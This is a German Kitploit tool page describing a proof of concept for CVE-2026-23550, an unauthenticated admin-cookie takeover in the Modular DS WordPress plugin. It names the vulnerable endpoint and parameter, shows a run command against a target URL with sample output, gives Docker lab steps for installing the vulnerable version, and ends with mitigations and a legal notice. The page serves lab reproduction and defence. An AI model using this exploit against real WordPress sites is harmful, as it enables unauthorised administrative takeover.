Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-23550-PoC — CVE-2026-23550 - Modular DS WordPress Plugin **Nicht authentifizierter Admin-Zugriff** | Kitploit
Tools/GitHubGitHub/thetorjancaptain/cve-2026-23550-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsAuthentifizierung
GitHubthetorjancaptain/cve-2026-23550-poc

CVE-2026-23550-PoC

CVE-2026-23550 - Modular DS WordPress Plugin **Nicht authentifizierter Admin-Zugriff**

Repository anzeigen
1vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-23550-PoC

CVE-2026-23550 - Modular DS WordPress Plugin Unauthentifizierter Admin-Zugriff

Status CVSS Affected

Proof-of-Concept (PoC), das CVE-2026-23550 demonstriert – kritische Übernahme von Admin-Konten ohne Authentifizierung im Modular DS WordPress-Plugin (Versionen ≤2.5.1). Wird aktiv in freier Wildbahn ausgenutzt.

PoC Flow

Angriffszusammenfassung: Fehlerhaftes REST-API-Routing in /api/modular-connector/login umgeht die WordPress-Authentifizierung, wenn , und gewährt unauthentifizierte Admin-Sitzungscookies.

origin=mo

🚀 Schnelldemo – Wenn WP bereits eingerichtet ist

root@kitploit:~
# Produktionsreifes PoC
./CVE-2026-23550-PoC.sh http://target.com

Ausgabe:

root@kitploit:~
[+] CVE-2026-23550 Modular Connector Exploit Test
[+] VERWUNDBAR: Admin-Sitzungscookie ausgestellt

Technischer Hinweis:

Der betroffene REST-Endpunkt ist ausschließlich über den ?rest_route=-Mechanismus erreichbar; der direkte Zugriff über /wp-json/ ist möglicherweise nicht verfügbar. Die Schwachstelle ermöglicht unauthentifizierten Zugriff ohne Anmeldedaten oder Nonce-Validierung. Die erfolgreiche Ausstellung eines WordPress-Administrator-Sitzungscookies gilt als Bestätigung der Ausnutzung. Dieses Proof-of-Concept führt keine administrativen Aktionen aus. Modular DS Version 2.5.0 wird beim Testen verwendet.


⚙️ Schritte zur Reproduktion:

Schritt 1: Laborverzeichnis

root@kitploit:~
mkdir -p ~/Desktop/CVE-2026-23550/cve-poc-wp
cd ~/Desktop/CVE-2026-23550/cve-poc-wp

Schritt 2: Docker Compose

root@kitploit:~
version: "3.9"

services:
  db:
    image: mysql:8.0
    restart: always
    environment:
      MYSQL_ROOT_PASSWORD: rootpass
      MYSQL_DATABASE: wordpress
      MYSQL_USER: wpuser
      MYSQL_PASSWORD: wppass
    volumes:
      - db_data:/var/lib/mysql

  wordpress:
    image: wordpress:6.4.3-php8.2-apache
    depends_on:
      - db
    ports:
      - "8080:80"
    restart: always
    environment:
      WORDPRESS_DB_HOST: db:3306
      WORDPRESS_DB_USER: wpuser
      WORDPRESS_DB_PASSWORD: wppass
      WORDPRESS_DB_NAME: wordpress
    volumes:
      - wp_data:/var/www/html

volumes:
  db_data:
  wp_data:

Schritt 3: Bereitstellung

root@kitploit:~
docker compose up -d
docker compose logs -f db

Warten auf: "ready for connections"

Schritt 4: WordPress-Installation

  • URL: http://localhost:8080
  • Admin-Benutzer: admin
  • Passwort: admin123
  • Site-Titel: beliebig

Schritt 5: REST verifizieren (WICHTIG)

root@kitploit:~
curl http://localhost:8080/?rest_route=/

Erwartet:

root@kitploit:~
{
  "name": "...",
  "namespaces": [...]
}

Wenn dies fehlschlägt → STOPP, die Umgebung ist defekt.

Schritt 6: Verwundbares Plugin installieren

root@kitploit:~
wget https://downloads.wordpress.org/plugin/modular-connector.2.5.0.zip
unzip modular-connector.2.5.0.zip

WORDPRESS_ID=$(docker compose ps -q wordpress)
docker cp modular-connector "$WORDPRESS_ID":/var/www/html/wp-content/plugins/

docker exec "$WORDPRESS_ID" chown -R www-data:www-data \
  /var/www/html/wp-content/plugins/modular-connector

Schritt 7: Plugin aktivieren

  • http://localhost:8080/wp-admin/plugins.php
  • Modular Connector aktivieren
  • Onboarding-Aufforderungen ignorieren

Schritt 8: Ausnutzung

root@kitploit:~
chmod +x CVE-2026-23550-PoC.sh
./CVE-2026-23550-PoC.sh http://localhost:8080/

Hinweis: Wenn Sie Cookies in einer Textdatei möchten, entfernen Sie "rm -f "$COOKIE_JAR"" aus der Datei poc.sh.

🛡️ Gegenmaßnahmen

  • Sofort: Modular DS Plugin deaktivieren
  • Patch: Upgrade auf 2.5.2+
  • Audit: Auf nicht autorisierte Admin-Benutzer prüfen
  • WAF: ?rest_route=/api/modular-connector/login blockieren

📄 Lizenz

MIT-Lizenz – Nur für Sicherheitsforschung und autorisierte Penetrationstests. Nicht für böswillige Nutzung. Verantwortungsvoll offenlegen.

🚨 Rechtlicher Hinweis

Dieses PoC ist nur für autorisierte Sicherheitstests gedacht. Die unbefugte Nutzung gegen Produktionssysteme ist illegal. Melden Sie Erkenntnisse den Plugin-Maintainern.

Tool herunterladen